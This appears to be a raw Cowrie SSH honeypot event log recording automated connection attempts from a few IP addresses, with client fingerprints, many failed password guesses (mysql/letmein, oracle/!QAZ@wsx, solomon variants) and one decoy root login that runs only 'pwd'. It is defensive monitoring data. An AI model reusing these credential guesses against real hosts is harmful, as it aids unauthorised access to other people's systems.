{"eventid":"cowrie.session.closed","duration":"20.0","message":"Connection lost after 20.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:09:56.575337Z","src_ip":"212.227.235.229","session":"18a9d92d86e3"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"P@ssw0rd123","message":"login attempt [mysql/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:09:57.979674Z","src_ip":"212.227.125.160","session":"a2ce1347c060"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:09:59.412209Z","src_ip":"212.227.125.160","session":"a2ce1347c060"}
{"eventid":"cowrie.session.closed","duration":"301.3","message":"Connection lost after 301.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:10:05.094538Z","src_ip":"212.227.235.229","session":"d7aa85b67f09"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37240,"dst_ip":"1.2.3.4","dst_port":22,"session":"41c46e294a2e","protocol":"ssh","message":"New connection: 212.227.125.160:37240 (1.2.3.4:22) [session: 41c46e294a2e]","sensor":"my-vps","timestamp":"2025-08-31T04:10:08.104795Z"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:10:12.758416Z","src_ip":"212.227.125.160","session":"41c46e294a2e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43522,"dst_ip":"1.2.3.4","dst_port":22,"session":"699928545b55","protocol":"ssh","message":"New connection: 212.227.125.160:43522 (1.2.3.4:22) [session: 699928545b55]","sensor":"my-vps","timestamp":"2025-08-31T04:10:14.741697Z"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":57288,"dst_ip":"1.2.3.4","dst_port":22,"session":"62d5d8e6f7a5","protocol":"ssh","message":"New connection: 201.148.180.50:57288 (1.2.3.4:22) [session: 62d5d8e6f7a5]","sensor":"my-vps","timestamp":"2025-08-31T04:10:28.610714Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:10:29.266572Z","src_ip":"201.148.180.50","session":"62d5d8e6f7a5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:10:29.267268Z","src_ip":"201.148.180.50","session":"62d5d8e6f7a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38828,"dst_ip":"1.2.3.4","dst_port":22,"session":"4806b8d0d97c","protocol":"ssh","message":"New connection: 212.227.235.229:38828 (1.2.3.4:22) [session: 4806b8d0d97c]","sensor":"my-vps","timestamp":"2025-08-31T04:10:33.187979Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:10:33.812598Z","src_ip":"212.227.125.160","session":"699928545b55"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:10:33.813787Z","src_ip":"212.227.125.160","session":"699928545b55"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:10:33.945740Z","src_ip":"212.227.235.229","session":"4806b8d0d97c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:10:33.946461Z","src_ip":"212.227.235.229","session":"4806b8d0d97c"}
{"eventid":"cowrie.login.success","username":"root","password":"Pr","message":"login attempt [root/Pr] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:10:34.419348Z","src_ip":"201.148.180.50","session":"62d5d8e6f7a5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:10:37.986600Z","src_ip":"201.148.180.50","session":"62d5d8e6f7a5"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-31T04:10:37.987429Z","src_ip":"201.148.180.50","session":"62d5d8e6f7a5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:10:39.233452Z","src_ip":"201.148.180.50","session":"62d5d8e6f7a5"}
{"eventid":"cowrie.session.closed","duration":"10.6","message":"Connection lost after 10.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:10:39.234828Z","src_ip":"201.148.180.50","session":"62d5d8e6f7a5"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"letmein","message":"login attempt [mysql/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T04:10:39.923248Z","src_ip":"212.227.235.229","session":"4806b8d0d97c"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:10:41.815899Z","src_ip":"212.227.235.229","session":"4806b8d0d97c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62696,"dst_ip":"1.2.3.4","dst_port":22,"session":"23cc9b96be7f","protocol":"ssh","message":"New connection: 212.227.125.160:62696 (1.2.3.4:22) [session: 23cc9b96be7f]","sensor":"my-vps","timestamp":"2025-08-31T04:10:49.141455Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T04:10:49.142350Z","src_ip":"212.227.125.160","session":"23cc9b96be7f"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T04:10:49.226525Z","src_ip":"212.227.125.160","session":"23cc9b96be7f"}
{"eventid":"cowrie.login.failed","username":"solomon","password":"solomon","message":"login attempt [solomon/solomon] failed","sensor":"my-vps","timestamp":"2025-08-31T04:10:49.643042Z","src_ip":"212.227.125.160","session":"23cc9b96be7f"}
{"eventid":"cowrie.login.failed","username":"solomon","password":"solomon1","message":"login attempt [solomon/solomon1] failed","sensor":"my-vps","timestamp":"2025-08-31T04:10:50.729887Z","src_ip":"212.227.125.160","session":"23cc9b96be7f"}
{"eventid":"cowrie.login.failed","username":"solomon","password":"solomon123","message":"login attempt [solomon/solomon123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:10:51.815858Z","src_ip":"212.227.125.160","session":"23cc9b96be7f"}
{"eventid":"cowrie.login.failed","username":"solomon","password":"solomon1234","message":"login attempt [solomon/solomon1234] failed","sensor":"my-vps","timestamp":"2025-08-31T04:10:52.902614Z","src_ip":"212.227.125.160","session":"23cc9b96be7f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45492,"dst_ip":"1.2.3.4","dst_port":22,"session":"7101c225916d","protocol":"ssh","message":"New connection: 212.227.235.229:45492 (1.2.3.4:22) [session: 7101c225916d]","sensor":"my-vps","timestamp":"2025-08-31T04:10:53.943537Z"}
{"eventid":"cowrie.login.failed","username":"solomon","password":"solomon12345","message":"login attempt [solomon/solomon12345] failed","sensor":"my-vps","timestamp":"2025-08-31T04:10:53.990300Z","src_ip":"212.227.125.160","session":"23cc9b96be7f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56978,"dst_ip":"1.2.3.4","dst_port":22,"session":"446791130da8","protocol":"ssh","message":"New connection: 212.227.125.160:56978 (1.2.3.4:22) [session: 446791130da8]","sensor":"my-vps","timestamp":"2025-08-31T04:10:54.436065Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:10:54.910692Z","src_ip":"212.227.125.160","session":"446791130da8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:10:54.911336Z","src_ip":"212.227.125.160","session":"446791130da8"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:10:55.075866Z","src_ip":"212.227.125.160","session":"23cc9b96be7f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:10:56.992904Z","src_ip":"212.227.125.160","session":"2ec870681509"}
{"eventid":"cowrie.session.closed","duration":180.10623979568481,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:10:56.997603Z","src_ip":"212.227.125.160","session":"2ec870681509"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"letmein","message":"login attempt [mysql/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T04:10:57.185466Z","src_ip":"212.227.125.160","session":"446791130da8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:10:58.360512Z","src_ip":"212.227.235.229","session":"7101c225916d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:10:58.440807Z","src_ip":"212.227.235.229","session":"7101c225916d"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:10:58.598731Z","src_ip":"212.227.125.160","session":"446791130da8"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"!QAZ@wsx","message":"login attempt [oracle/!QAZ@wsx] failed","sensor":"my-vps","timestamp":"2025-08-31T04:11:00.478466Z","src_ip":"212.227.125.160","session":"699928545b55"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35752,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab2958a1db7d","protocol":"ssh","message":"New connection: 212.227.235.229:35752 (1.2.3.4:22) [session: ab2958a1db7d]","sensor":"my-vps","timestamp":"2025-08-31T04:11:08.325610Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:11:08.327575Z","src_ip":"212.227.235.229","session":"ab2958a1db7d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:11:08.640332Z","src_ip":"212.227.235.229","session":"ab2958a1db7d"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu@123","message":"login attempt [ubuntu/ubuntu@123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:11:10.220771Z","src_ip":"212.227.235.229","session":"ab2958a1db7d"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:11:11.536499Z","src_ip":"212.227.235.229","session":"ab2958a1db7d"}
{"eventid":"cowrie.session.closed","duration":"59.5","message":"Connection lost after 59.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:11:14.291574Z","src_ip":"212.227.125.160","session":"699928545b55"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"!QAZ@wsx","message":"login attempt [oracle/!QAZ@wsx] failed","sensor":"my-vps","timestamp":"2025-08-31T04:11:29.766387Z","src_ip":"212.227.235.229","session":"7101c225916d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46330,"dst_ip":"1.2.3.4","dst_port":22,"session":"80668b59c034","protocol":"ssh","message":"New connection: 212.227.235.229:46330 (1.2.3.4:22) [session: 80668b59c034]","sensor":"my-vps","timestamp":"2025-08-31T04:11:32.442528Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36388,"dst_ip":"1.2.3.4","dst_port":22,"session":"035d51996a7d","protocol":"ssh","message":"New connection: 212.227.125.160:36388 (1.2.3.4:22) [session: 035d51996a7d]","sensor":"my-vps","timestamp":"2025-08-31T04:11:32.565644Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:11:33.227722Z","src_ip":"212.227.235.229","session":"80668b59c034"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:11:33.228469Z","src_ip":"212.227.235.229","session":"80668b59c034"}
{"eventid":"cowrie.session.closed","duration":"39.7","message":"Connection lost after 39.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:11:33.672995Z","src_ip":"212.227.235.229","session":"7101c225916d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:11:36.578790Z","src_ip":"212.227.125.160","session":"035d51996a7d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:11:36.579763Z","src_ip":"212.227.125.160","session":"035d51996a7d"}
